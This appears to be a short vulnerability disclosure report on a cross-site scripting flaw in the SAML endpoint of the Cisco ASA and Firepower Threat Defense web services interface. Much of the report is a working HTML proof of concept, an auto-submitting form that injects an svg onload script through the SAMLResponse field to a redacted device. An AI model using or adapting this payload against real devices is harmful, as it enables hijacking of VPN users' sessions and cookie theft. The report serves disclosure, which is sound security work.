Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device.
Steps To Reproduce
Go to this URL
http://www.info-sec.cl/post-xss-███.html
HTML POC:
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=‘https://‘██████’/+CSCOE+/saml/sp/acs?tgname=a’ method=‘POST’>
<input type=‘hidden’ name=‘SAMLResponse’ value=‘"><svg/onload=alert(document.cookies)>’/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.
Supporting Material References
https://www.exploit-db.com/exploits/47988
https://twitter.com/sagaryadav8742/status/1275170967527006208